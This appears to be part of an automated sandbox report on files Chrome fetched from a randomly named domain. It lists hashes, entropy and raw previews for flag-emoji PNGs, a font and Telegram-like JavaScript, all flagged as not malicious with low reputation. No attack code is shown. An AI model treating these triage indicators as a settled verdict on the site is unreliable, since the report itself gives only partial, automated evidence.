                                  SSDEEP:96:YaLXFEJsAEFM5OAxEp9GtuAE/899Qu0uhvFv3hNSAI3acT1HSYD9xSWqb3L6lz:Pq0MIAx/tv9nvOn3acdLD9xVqrOz
                                  MD5:ABE847655ADF5AF30CCBAF861BE3037A
                                  SHA1:BCCC93B4A6AA16C9DF27A561F1A1738566BEEDE4
                                  SHA-256:9F14380EEEFE13A35ECEA3AC5EFB0C1D0148B3A4AC28B717A161FD69EB84B818
                                  SHA-512:51C17CDB2D9E79C0A3600DB173F966523C62D9AB13DDEB73C80C0AA73DABF6BCB9CA9D0358B02A47D3550BFB554DE9C66339BB82DCF87E169D128B15CC4F7C31
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f2-1f1f0.png
                                  Preview:.PNG........IHDR.....................PLTEGpL.YD..de....dh%..o.q^e..|m..sw.io..'.'-.{..i.tx|[.e...mr}1.t...z.g...txh....esd..qtf...sw.v..ng..wa..ux..Ud...run_..m..2..5..4..4..6../..7..4..)..8..0..7..'..6..7..)..H..6../..!..7.....V..$..,..5.....&..7..(..(..b.....#.5.....#..... ....9....1...I........*.$...>./.....9...._.,...D...'.;......W...<.".......D..&.=.*.....i.......#.y?.#.v3..#.ux....hB.w!.os.h8....il.jn.nK.bf.[B.j&....ej.w!.[a._d.V\....\/.PA._c.PV._..z..V[.IC.y..IP.NS.S'.SX.@F.@H.s..CI.?G.FM.H2.>F.=E.N$.i..>E.:F.Z..;D.IO.;C.=B.9A.:A|l..@F.4G.8@.:@.G..6>.7>.>*.4<..G.4;.19.6<.18.(Hsb..7A.06.*?..6.-4.+4.5".!C.*2.28.,3.-4.*1.(0.$8.&..F..&-.;&.,4.(-..;..5.$,.#+.#).!)..3.*/. (.%-..&..4.*/..%..&..$../.."..!.',..". )..-..&.. .%(.....'..$x %..#...o.#...z..j..t..a..u..S......)tRNS....&+88FNP[bcdgggh.~~....................C......IDATx..y.\U........."Iw.0...H.Lp..I.I0..A...GpE.g.......9..0p..A3..Q....\..$Q6.c..I.twz..k{.oR.^UWu*PI..?.S..yU.U.S.{...]...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):4839
                                  Entropy (8bit):7.920204709853416
                                  Encrypted:false
                                  SSDEEP:96:T4ozoyuNruNkENKpK0kHCMiVqUaCHlQ58eK+v0XgNb:Uoky8rlEW+iVqBOlQyeKk0wJ
                                  MD5:9224930251CEC04977AABF4087010597
                                  SHA1:36748C791A25774B67E31DD8E480648246DBC85D
                                  SHA-256:A162B2802DD1EF1F3228C18444D2F9D118D0D8A494AA7105ECD18A5B68090ADE
                                  SHA-512:7C5BC3DBD002D63DE79B23D6E58DC03268E2B61DC5BE68D93100476675FAA28DCCE90F67FA7B0A3C9C4A6A9B119B63D09889AD64ED02F8CCCB62E8EDCBB1D4C8
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1f9.png
                                  Preview:.PNG........IHDR.....................PLTEGpLq5'.ff[.[`.....e.e.3..hh~..~...]].6.Z.Z....ii_.b.5..JJ....aa.;.k.e.6..aa~...llf.f.4.HsH....ZZf.f....5..jkd.d....7..ii...d.d.[[y..[uPHb).................%...........%.................!...........'.....K.....*..........2.......~..H....jk..&.ff.bb.. .[[.ijf.c.TT.\\.LL...mm..CC\.\i.(.RRvvI.9:.l..AAxx ..5.FFS.SI.I.JF.11lkI.**.&&.a7.&&.@@.%%no..%%D|D.##.KV.64....%%.$$%.<.!!WW..."."".##Ur"....57...As@.##ge.4z4.......()......dUM....>X..!...]].-r-.. ...HH.....(3... u vI!...-k-.1,..... .......w.....r....bDS.........TR..p...(GU$..........m.-_(|.P....k.....f...........n.....j.......MI.w1'.h.....g.....e..a........d..........11.}$$.b......*....`.Y4....:D..X.._..^....?6C.\.....[.e%#.Z.....Q..X.....W..I....t.+.V..T.17..O.....F.9*.....?..J.....D.P...:.x...<..'..9..4..0..>".....tRNS.....)257<NSRWcffjo|~~........................E@|....hIDATx....K.q....M.i.x&.DBB....FXB.&...C`..1.9%....I.....l.u...{.66.Av...`.....G.3kcX.....|}.D".H$..D".H$..D..R..j.E.$..K
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:Web Open Font Format (Version 2), TrueType, length 11056, version 1.0
                                  Category:downloaded
                                  Size (bytes):11056
                                  Entropy (8bit):7.980947767022165
                                  Encrypted:false
                                  SSDEEP:192:duC8R1LnQKFt7DX2XFEu+zjdNr/ucPDf/Teifn/m1t7w9vxUBpZRCo++TkXT0R97:dL8bQKFt32XF/+zhNr/uS6i+tU9v6RCM
                                  MD5:07DB243DB21ED0A6B4FF05FF429686B7
                                  SHA1:5D62925FDD7ED8E80F206D095ED093994F13D276
                                  SHA-256:CE897833AC6E362DF7C91AC8223FE511C6DEFCF33964928A81004600A2DD4C2E
                                  SHA-512:D34D15E91BA706886F7B098B5A42B3E31D374FDA47D6E873F10B40FBEA78D848921D124FC17045E77C432BCF2B4D4ADFE5AECA4C3122CEC199AC92E3124541EC
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/KFOlCnqEu92Fr1MmEU9fBBc4AMP6lQ.324b1e6d0f5ae7c6ab42.woff2
                                  Preview:wOF2......+0......T|..*..........................d.....|.`..l....H.l..r..6.$..`. .... .;F3.....Pg&...l...mP.e..%.?$h.......cb...)Kk..c ..xy........|W.uw..1...q...j..c.#........Hb.Dv..uO..........B.(.?x..?.._AK...M..G....Q9F.DK..A.E...C,J,z..R..D..Zf...?.#..l,....g..P.\..].}.l...:...U..u.J.q...!8.i...df.....(qwe.....h.NJ.......JY>....Jp...r.;.d ....{e.....ey.U.*s@@-..R/3G..e$...B..K8Gi.dP.8J..AWY.Q...o?.f:...i......H..9..n7[...{..@9.p.B2....$l_......}.......$..4...y.._S.e.^i.4m..P=B...!.#$.P...i.....=.............0.]...V....U.u .s..R@....(..)Chp.....+."^<..."Y2D.t.:.P.|.@..E.% @@.B...Q..m.=3.854.....t....9..@..0".8..@?`....( ....0.^!R...R..v.0+.g..L.@.%>../c.d.daYeG.jG....7."5r.ZJ.......o.....cr..eU..4...Ch..a.......2Qb$I.&C...%..C.!c&LY.b.=G...+..AC...5f.I.^z...c.kK..X..W..........0.<>..Sr.kG x.L.W......@$b.....#.F..t.2....._....J....R.......2l.X...o...b.7K..X..7.6l.[..c.`...!l...>.b.Sl...\>.g.B.)..$..y.pL..4f.1.b../....Ol..."9U08.Q..>Z.....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4744
                                  Entropy (8bit):7.938729169676506
                                  Encrypted:false
                                  SSDEEP:96:Yu6Ut04HFwRad4DoMOaGwRI7gYlSKcDtXc3G7fjYMru:Yu60BFwQWyaGwRkBUKcDtXy4LYx
                                  MD5:71C684A325E9FF8883FE9B7192721BCD
                                  SHA1:1A0F78382AB565044A65DB312AC27909239695D0
                                  SHA-256:F81BDF2E3EA6131FCB751A07343C8D043B6522262BC7FE20A8ACCA4D2A427069
                                  SHA-512:95AD179849F081D0B00AA2E7B4770AB0F7E72385F067D18D6ADD28F3806F7FB2D2F2AB33248609865EFAC5F37C1DBFF7CF03DE36A10EAD6755E82DC61D538AD2
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.}..ln.x|.st.{||||.os.~..vz{{{}}}.x{.RW.pt....17.~.....uyrrr.ae.vz........ .nr.BF.~.uuu.tx....y}xxx.lp.x|www....~..x|.puxxx.x|....EJ.}.vvv.nr._c.................................................................................................................................................................................................................................................................~.......u{....|.....jp.x|....vz.rw.ot.jp....qu.ek.ah.ko....W_.Ya.ej.[a....in.^c.T\.MV.PX.MV.LU.ei.LU}}}.KS.NU.JS.KS.[a.IQ.SY.IQ.HPyyy.GO.[`.FN.GO.EM.@J.HP.KRttt.BK.CK.QW.@H.AI.TY.?G.IP.7A.<E.=E.AI.;C.7@.DK.9A.7?.09.8@.IM.<C.4<.8@.4=.2:..7.3;.@E.7>.08.07.-6.%/.)2.08.,5.*3.*3.3:.)1.)1.;?.'/."+.&/.'/.&.."*..$.07.$,..$./5.$+...."*.!).....&..%..!.........I...1tRNS.....$127>@OQU]cceefgjyz~~........................S......IDATx...[.\.]....r.s...^.1.np...V.jC.E".R.Ux..%..&.<4.C..<D.....O\...E....5q.5.(...MS.......3s.....7...k...+_^.+.t..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5475
                                  Entropy (8bit):7.936372844862504
                                  Encrypted:false
                                  SSDEEP:96:mW385UxLhO0KyIsYB2A8YImHMA4PP/EwO3P68QcRXSGRJu4+l5UBXdYiEFa:P3829fKyIsYB2A8UHMAMPc5h1gvrUNxF
                                  MD5:FE77334AF3271214DD172A8C787070AA
                                  SHA1:38A25F727E5EC802675221C667E9C9848B690372
                                  SHA-256:6648C71232F9969A969A238F15BF4EBBE22A9A46ED33C61122DD9079469E85F0
                                  SHA-512:11A91E572CB1F3DEB550B46C9E48064A12230AA8A91405F4DF36D18AEA7BA7FE1266C8B1A543E5BB9CC96D2AD756FCAF220E5E8DF8AA6F97DCEDDCBB2F6615AD
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL..=dd...8fe...<lk...:..?ea...7.{...Ojg......7gc.JJs....KJu..r....9...nh...8...l<Q..9dd..{.XX...:...jj...6.gs.....2bb...?..;ll...1^^...?.fo..3.HHt.1...........................................................................}..........sr....wwl...ge....|..[Tt{.tt..OK.E<bj..><be|.1'Z]..0/.44.&..&&....&&."".(,. ..............................................................y...&&}&&|&&{%%{%%z$${.&.##y...""x..u.....t..s..qw....ps..a....x..j..p..X..O..i..Q..I..g..f..B..d..m..b..Q:....?..^..h..D..N..9..[..W.._..W..O..V..T..J..D..>..1..:hg.]].;;vTT...h.XWLL|YY.RR~FH.&&j;;.//_,,q..l..d..`..Z..b)'x..l!!o.oq44}/0.bb.##t..dDDy...jk.>B.........\++|..dNN...d.......cb_^..."...@@...KK66q..n..... w%$w..Y..........57.QP..]..^........X.....`..^.....[.AA..W.4.....4tRNS...."*8;KSTccehkz{.~~~~................................v....IDATx^..gK.Q...d.....&o..VI0,."F?..^..f...v.. I.WY4.8?..x._....a..a..a..a..1...<...B.<.l.y.......)A... ...I....'&..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4385
                                  Entropy (8bit):7.943115717111238
                                  Encrypted:false
                                  SSDEEP:96:S7Ch+F1RebmzbF5l4Egsj8GxWxFoZ7SsykP7EdBBCy:uRkmzbF5Arz27SsP70BCy
                                  MD5:D578DD13DA4967D7BC23BC6F371E7CCB
                                  SHA1:69A20D97FE83982B6ED1BE3C30957E2D5B97FBA5
                                  SHA-256:0D446F30909AF3FB48AE1CD2AA848EAC3AD2C9FCCAC9059F9567A289AECF4AC0
                                  SHA-512:CF6111C51B36959DE8358754E6BB746911250496885A53E70BEB46205B9EF1CA0DF79567E93EBE966F4BBFDFCC78F6102259B8C0F9177EA4169AE79B5F20A09E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL...pt{...ptx...afmvx{......r...,Fyyy{{{...uuu...}...*D.........rrr$>`~.....qqr%8Q.........&G............qqqs.......uuu.....Hvvv.....s..www...q......-Gtuv...........s...-G...uuu...............................................................................................................................................................................................................................................................................................................................y........o........p..|||j}.`~.yyyuuvbw.qqrYs.Sn.Jh.Qd}He.Ac.:`.>_.9_.8^.7].7\.6\.5[.5[.6Z.4Z.4Y.3Y.3X.2X.2W.0V.2U./U./T..T.-S.,R.0Q|+P.)P.)N.+Mx$N.'M.&L}%K}$J|'Iy'Iu.J."Hz'Gp"Gw!Fx.F~ Dv&Bg.Cu.Bt.As.@q.?p#=^.>o.=m.<l.;k.9k.9i.7W.9p.4_.4j.1M.1h./T.-G.+b.'I.%\..E.c.@...>tRNS..... ",57=?@JLQTU[cccccegwwx}~...............................c......IDATx..M..G....S.=/........$..N....qF(..D..........Cp@BA..H........xg.....S...w.w.v...mOwu.....j..f.
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):3679
                                  Entropy (8bit):7.933989066143552
                                  Encrypted:false
                                  SSDEEP:96:Bn/B0iXD/p3M3zdQlCSGzCYsucpTKsIrjl:Bn/phMjyGQuiejl
                                  MD5:EFD0AD4821922BE63008DC46A3FEE452
                                  SHA1:8E09B8A4BF3DA4E0F3A3800B4852C3BE8D91DDF0
                                  SHA-256:DBE5F8BB864489DE78A18061C1D12C6E0618F0C9B47D91036CB7690B783BC72F
                                  SHA-512:8D42BFB8AAB5785C8E4423E0B25CBE36F5EE4CEEF788C80A8ECAD0885468FDF2DDEFBFF60B6D551541514F9D9D0F59CAFFB0F8830F95B2615AACD1BFADAFDBA4
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.pvf......sxn.$...syh. ...y{e...<I}}}.mw...!/h..zzz.gpvvv...r. .........nxh..ttt......hrj."...s}yxx...j. ....jt...a..}}}n.%.....a...s|.cm....................................................................................................................................................................................................................................................................................x......mw.uz..{....ls.ep.gpx..._k}|{.Zh.gm.qp.Tbwvv._g.N^.Xcsqp.GX.O\.?R.ET.NY.9M.6K.6K.6J.5J.5J.5I.3H.1F.2F.;L.AO.FRib_.3G.0D.3F./C.NT.,B./B.,A.0C.+?.;I.+>.4D.(<.-?.';.%9.6D.(:^RP.#8.!5.*;.0=. 4."5.#6..2..1..1..1.(7..3.#5../../s9@..-..,....&4..,."2LGC..*..*..(..)..'..&..*.!/.!...,..%..%..%..$..$..,..#..!z.)..%q.'...p."s../*(f.._.....~g~P...1tRNS....."%36=CLUX_acghx{~~.........................."d.8....IDATx....$g........g.{......41..../.!x.Aa..M.....^E."(.! zT$.r.d..&D...w.......yL.LQ.....n..w........U.n.u..[.n
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4320
                                  Entropy (8bit):7.874669210931158
                                  Encrypted:false
                                  SSDEEP:96:dF6Z57OrXy9f0KrOdCTptDMvOjZNZemK/kLpVBkd727sGiv+uT:dst41gHuGZNZed/8QTxrT
                                  MD5:C5D4340E1BC12DBC4C2498A53D3039A3
                                  SHA1:FA71316BC0CA34A8A9D5808085A848956F56AEDC
                                  SHA-256:1C6E25DFFB5133153120F4C46A6F4B4D6259319A3B61B0CC92D61E9E03BCB29F
                                  SHA-512:D64B0B92FFE5DBAAD7A1C6A37D4D74513F48EA4C93AF843BAE5C772AB048EBD11F8E1742FE4EE391A55FCE2624146901D89D1591B0154B927896A586B04FE64E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpLh..j{.`..^o.g..fv.f..du.<Pxg....+./`hy.f..`q.s..:./..J`p.i..l}.eu.<Nuf..eu.Rc.Re.h..j{.g..aq.d..`p.iz.m."b..k|.`q.l."`....I..G..F..@.?.;.:..:..8..0..1..0..-jz..{*du..v,^p.[m..n).0;Xi.Si..3B.4E.4E.4DRg.mhB..;.3D.3C.1BQd..0A.1BKc..0@sb%..?.0A.->.6R.*:.,=D_..*;..>H]..#/]]F.(9.):?[..7Y.&7.+;.&7.;cBX..$59W.."3.#3.*8KV\t>lcU!.%5. 1>S|..0..%7R.2R.. 0...WC{....!0.&5..-1P...-KOE..+.!1.&6..,..*7L{+M.y/V0J...)1K}..*&K.&K...'..(&J.&J.%J.$J..!...&..,.#7%I.RG!$I.+H..L....(H...%#H.N8o.N."G...#..#"F..L...$7EW!E.)D{..!..!..$.!/.D...*....C..B......%....G..@..@.!?{K/^..)(>j.>.....A..=.{.'m.@A9.....;..:v..... N(F.:..8~q.$y. .6w.6}.5q...n. .7..4z.3g=!U.2..2yS.A"*h.1sk..{..4...0v./]u....q..uf...,\m...,r.+n.*pa...)m.)o.%..'j.'v.'m`...&k#.K.%j.$j.$g.!b ... ]..u..S..K..G.......c:.....tRNS.....,6CSUTccegw}~~.................................................................................................................-.Z.....IDATx.....e....<.<.rss.{...PH.."B.. "v
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4588
                                  Entropy (8bit):7.919630401586666
                                  Encrypted:false
                                  SSDEEP:96:iDmhAry1fEliRYkj/q8NYKfCRwrKx2/eabTYTym/BKB7YfZMquXwP2wxYB5FioUI:urS6a+AYKaWec1TYT9ZMlXwOEo5FPN
                                  MD5:8319321208DB2E33135CD0311CA9AA61
                                  SHA1:05AFF4D62E2BCC14984A19AE428B882059662EC7
                                  SHA-256:6543E4470B096DA26E6B1059FCF7193C07B8C10B7DB2D611B795ED8C489C8F92
                                  SHA-512:F26A83CA03776FB8A2948FD68A8A0AB76710DE031FDD03A413952F2D7776C617F57F91795446919447F056AD7FD1005DDC4378FCADA850D860BB9D5D36651CD4
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.a<..6.. .k..Urg...W9.xQb...Y:g...X9j...X:i...X9.X>k..a..\...S5b...S4.\A.^?.gF.V7_...P2^..^..,s./u.L....T.)U...$.|%.~%..%.......5%.}%...$O..G..3.!L..1..;.{...9.z......Z...../..W..K..s..<.....X!.x..I..\..^......#.z.~.!....d..q%....6.....v.}............B.#N#..#.{..C..E.....>..a.'S..A.....m.....l..a..j.....=..h..d..^..3.yQb....>.qE..?..5.. ..V..R..g:...}L.j.!.v..H.aA..o.S3.]<.%QH....Z.X7....#PR...a;..`..2..E.w.Y..]..i...eDS....d.f>..:..?..K.......~TC....<(....A.....#.qL..f..(.....*F....)$..7....Z.t.V...~.I......N/....kH@.. .o/..&.u....q..j..7.Wu.q.7....P.i..kB..b. P.a......).wJ*..0w...d.._......@a....Sq.......i..Io..|.4].=e$..?|\....Y{.....j......;...Kd]X.......QsZpBi.'B|sf._`.d....z.:IcM..T....t.]FE.S.cq.`.n.7\W.........Pm.^...GO.r.5RMLs8_.......*e.:.q."Jct-=...$tRNS.~c~c~..c.,8..Ee...T^....dpw.$...c..Q!...wIDATx...k.p....w..D...A.w.C..8u..R......7Wq..z...M.5 !.....v.c...../.b.w^..W.......r...x<.....x<....}..DI...IH....HRJ.....&..:.c
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):6219
                                  Entropy (8bit):7.9383581311807685
                                  Encrypted:false
                                  SSDEEP:96:pdpzFcZCAOqU8DVj/fbWNQg78pLaNVGl2r89rB3Mfr2Y0ch5xW335KQYgkB1fXMd:3pmU85LfbWNQgkazGUAkfR+pdXd
                                  MD5:5490EF2FD940C91DBDD3F549A3792782
                                  SHA1:ABD1FD93F4CBC50D0CF9B6B0E162DDFBC5CF43B9
                                  SHA-256:FB4EFCB76E7DD8519E700D0A37D72CD6A90FC721FD2262A444D7D0E843DC595C
                                  SHA-512:DF60D5CFF50C530D322182124F37248D07FAEC9690AB644D3E64EC2F18DBDAB3E0FEFA6E368E87AE06A69A87C450FCF83C0D804A168E392191F6F7E8CBD318B1
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL\\.22fJJ}bb...Jhh...Cgg...J__...B........_ll...D__...N......ww...HCCn``.ll...Djj......D\\...Cjj....^^...Eii...Fkk.\\...J..=...77r.................................................................................................................................................................................................................................................................................||.{{.tt.tt.nn.nn.jj.ll.ee.ff.cc.cc.``.\\.]].[[.]]zZZ.TT.VV.UU.QQ.QQ.PP.MM.KK.HH.II.BB.CC.BB.CC.>>.AAz::.::.55.55.44.11.00.--.,,|)).**.&&.&&.%%.**h$$.$$.%%{""."". .!!.........{...........t........j...........y..d..s.....[.....u..{..j..a.....S.....|..s..M..\..y..w..n..~..K.....v..s..d..Y..p..r..R..o..}..F..m..y..o..s..l..i..^..e..[..b..U..@..H..L..<g,.6...,tRNS......33>HUVcccdgsz~~~~.....................H>.4....IDATx..[.$.Y...RU]U......b'..5I@..."...%.%R....."...@....B(...D.$...."...BDH bH".g....].ef.g.{..U.u9.0u./....^{......Q...
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):4993
                                  Entropy (8bit):7.939834658143953
                                  Encrypted:false
                                  SSDEEP:96:hKPZW6APESXFX20zW4DJwPjKJK6LMza+TdOtqCgZws6wnM2BTPY/E0v5A6mpCq:hyaEmpm7qFp+TNw32ZIKT
                                  MD5:EEA4DA57C82367C2AB37FFA67EF74B17
                                  SHA1:AD1B3AA461E80E09094EC6DC15FD5DDD7FF3F9BE
                                  SHA-256:A1448EBA3763BB4C28BA7AE8AA0D84058525607C6FCA7F108CEB25051C091FD9
                                  SHA-512:4F5A497E16EB7C6826807C74D61484A069B800D587C19DBAEF7CD95D87A0EAEBD0A2E4C987E0AB7B8B36ACCDB3EDED238D82C362A94982562F91A89961FBBA43
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.>Ff...iqk...iqg..f...jr.owf..g...iq.CNw.$. ,.px..:g..`...goj..u...&2g...ho.s{g...CL.nv.dlg...pyd...hpg...nvh...rz.S[l.!.dl`..m.".<F.................................................................{..t..ly.gt.rz.bp.ow.^l.lu.ir.eo.Ue.fn._j.aj.Ye.ck.[f.M].S_.^g.[d.T`.MZ.FV.V_.Xa.EU.OZ.KX.@P.ET.>N.KV.;L.NX.BP.5G.=K.4F.6H.4E.7H.AN.3E.3E.2D.3D.3D.1C.DO./B.1C./A.>J./A.5D.,>.0B..?.->.,>.6D.-?.,>./@.*<.*<.':.*<.+<.7C.,=.(:.(:.'9.,<."6.'9.1?.&8.'8.%7.,<.%7.$5.$6.#5.#4.(7..0."4."3.$4. 3.!3.)8.....1.2=..,..1.!1..0."2..0../.'6../.!1.....(...."2..,."1..+..-..+.%3..*..*..*..#..(..(."/..+..(..'..+..&..-.#0..&..&..%..%..$..$..$..#.."."-..$..!.."..+..!..+..!.. ..!..$..'........ .. .....).."..&......|.&........!u.%p.#......y..m..z..i..u..q..e..j..b..c..^...e;....-tRNS......"12<CSUUacegfpwz~......................|.4i....IDATx..{.\.Y...v.\vf..k....:..!.iKC]......M+.TU..............-M.E...Q..Um%..6)4ML.L.6.v.o...mvf..].........?..=....9..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:downloaded
                                  Size (bytes):5357
                                  Entropy (8bit):7.935966169409658
                                  Encrypted:false
                                  SSDEEP:96:YsYLMFACmt3eIVreiTu0pUsmyTCPg8TE1nA/X5NYlsTgim3qthJTTqhehq+:LYLMFktOi6ksyTC5g1A/Xv1gim3qtzTf
                                  MD5:C090632200FB917389370FE59395A135
                                  SHA1:D3784B1A2D487DA80F495AD437220251B9E62E4F
                                  SHA-256:1EDEFD8658D380F67B0CFE321F48AA2DEEF4B209DEA960E7FAF35BCF1C6F1A1F
                                  SHA-512:B64F1F4DAC3F2C17D0EC1C71527707DA4E7022868564D3C3391E6E8CC4D4CF13E114BB82DFB097192906419708CDCC2B398EFFC5E9F178AA9BCBD3FBB47B4F9B
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/img-apple-160/1f1f5-1f1ec.png
                                  Preview:.PNG........IHDR.....................PLTEGpLS)+.ux....kl....vx%...y{....JL.su.02....{}.qs....%(....su....}.KKKo...uw.......uw`ZZ....}.....vwY\\...t...qs.z|....}.....np....y{...VUV;::l..........A.....@.....=..A..C..?.....2..=..9.....7..-.....3..4..2.....D./.."......). .&..E.".$....C.'....(.I.,.wH....}1.fL.mo.or.hk.r'.i5.bf.^b.OT.fh.WL.Z^....UX.LQ.Z].e(.GL.\_.OS.KP.KO.JO.JN.SV.[^.JN.IM.MO.GL.DP.W/.FJ.?D.FJ.Y\.RU.DH.HK.>O.CGttt.>B.M1.AE.IN.8O.NQ.RU.?C.7;.=A.;@.@E.<<.DG.9>.1@.6;.*M.69.<+.6:eee.38.7<.FH.16.26.69.6:.03.*8.59.-1.<?..1..2.+/.#8.*..+..(..25.(,.&+.)-.&*.%).:<.%)....#).$(.././2./2./1.7:.#'...KKK.(+. #s02.&)BBB...3AAx!#...X-.z..444...T "...;'')))&&&.!"%%%#$$###"""@..!!! .#".............! ........................#......................................................z|.oq.bd.gi.uwl.....0tRNS....%)5<>PUUceewxz~...............................5....lIDATx..k........lv.....]..n...tJA.*B...XKKG.^P;C..v..S.v..'.x..J....8e.B...A......]Vv.l6..z.)..K6........d.....sN..
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (14402)
                                  Category:downloaded
                                  Size (bytes):14456
                                  Entropy (8bit):5.480783176887179
                                  Encrypted:false
                                  SSDEEP:384:1UkSTrXtVSGpk8UDEua/4L+DnOQUluZIah87A6hXm1WdHgl2scj/2y:1UkSTrXtVSG+8UDE1AL+DcuZv87A6tCM
                                  MD5:6471DBAD18AD444906E7A2BBAC930E90
                                  SHA1:2C1F84CAF20C633205F7535B129AE069187EF14D
                                  SHA-256:1FCE51354CFB15E01D900A86D9806D476A4CEB7FD409A5F2744E8BB81FAB56E8
                                  SHA-512:EE3D964125EE12B14230F7577FF23B2C62BBB924D234596A4A74A184431F6BF3DD11EB606B345DAEEA218275C5B84919AF6D35DDB64D5A53E08945C20AACC339
                                  Malicious:false
                                  Reputation:low
                                  URL:https://wkybcnfuqpgjx.ltd/2976.4e6e9b1254ce313f06c5.js
                                  Preview:(()=>{"use strict";var e,t,r={2976:(e,t,r)=>{var a=r(7784);const o=("undefined"!=typeof window&&window.innerHeight,Math.round(450),new Set(["newMessage","newScheduledMessage","deleteMessages","deleteScheduledMessages","deleteHistory"]),new Set(["image/png","image/jpeg","image/gif"])),i=new Set(["video/mp4","video/quicktime"]);let n;function s(e){n?n.push(e):(n=[e],Promise.resolve().then((()=>{const e=n;n=void 0,e.forEach((e=>e()))})))}new Set(["audio/mp3","audio/ogg","audio/wav","audio/mpeg","audio/flac","audio/aac","audio/m4a","audio/mp4","audio/x-m4a"]),new Set([...o,...i]),new Set(["USERNAME_PURCHASE_AVAILABLE","USERNAME_INVALID"]),new Set(["t.me","web.t.me","a.t.me","k.t.me","z.t.me"]),new Set(["AU","BD","CA","CO","EG","HN","IE","IN","JO","MX","MY","NI","NZ","PH","PK","SA","SV","US"]),new Set(["USER_CANCELED"]);const c=new Map,l=function(){const e=new Set;function t(t){e.delete(t)}return{runCallbacks:function(){for(var t=arguments.length,r=new Array(t),a=0;a<t;a++)r[a]=arguments[a]
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:PNG image data, 160 x 160, 8-bit colormap, non-interlaced
                                  Category:dropped
                                  Size (bytes):5524
                                  Entropy (8bit):7.939178666037659
                                  Encrypted:false
                                  SSDEEP:96:qyRrajvOfh2zvuvRUwEjxqQJL292z2C60uLPRV:VUi0ORt2xNL67CvMJV
                                  MD5:117352D938615D96C64C6EE2279816F8
                                  SHA1:E3BF98EC8F4AC3EB304CA8C3571028A222404057
                                  SHA-256:45DF40169DBCBBE99C39A24954059130D4C516ED3CDE5B530CDEEE9A10F86427
                                  SHA-512:A127DB5DCD46DD2C2D35895C786CB83C2055779506375F707B244EFC114BF8CA3E82DF96A8EEB8541A524D9734DA7E721F59C759774CF6B71FDB87EE4FA17A5E
                                  Malicious:false
                                  Reputation:low
                                  Preview:.PNG........IHDR.....................PLTEGpL.j=.G$ C'.F(.Q-.Q-.O0.P2.N).P3.G(HTS.]lb..m..b..`..`t..es......3OpKc..cq.cr.fu.^l..2.M?....._..cw.cw..`os{....t..m..n..k..w..ez._t.e{.l..t{...J.s/.j2._,.S+.N'.....T.......hox3?..?.... A.*J..8.4R.3Q.1P./N.-L.+I.(G.&D.$B.!?..=..;..:..7..4..1.....,.....'.w...0.ax........................s....?..G..K..K..N..P..R..V .Y!.Z$.\$.]%.^&._..FI.x.........N.s.`tst9..K".S'.Z".V .P.|H.rB.d7.W1.]5.o<1KZBVR.....9.....%..,`iE..~.*u.;g)Gi.F @[h.0..9....y..w...5}....$n..`Ba.Rj..j<@\.7X.,O..Dx7TfjrN.'.}|?...................O_P..D.-H.6O.?U.L_.Xg.l=.vB..G..I..H..1..ESfb..E..C..@........................1..'.Mf....9U.....>..<..;.AT.2I.~~.......(B.!<..6..3..)..$z."q..c...}9.|8i..f{.^v.Xq.Ml.Df.9_.0X.&R.$Q."N..L..J..H..G..D..B..?~.:y.5t.2q.0m.-j.*c.'^.$U..J.y7........FYs....1tRNS.c.$....gO8.,..f........v.[_.7b....~.....'`.e;~..V.....IDATx..ytU.....d.$..$....V.7....42..vI z.2..R.$..P...B... .Dd..mo/2..H...V.D@ ..`....sv...pN..!t.....;99Y.<....
                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                  File Type:ASCII text, with very long lines (10642)
                                  Category:dropped
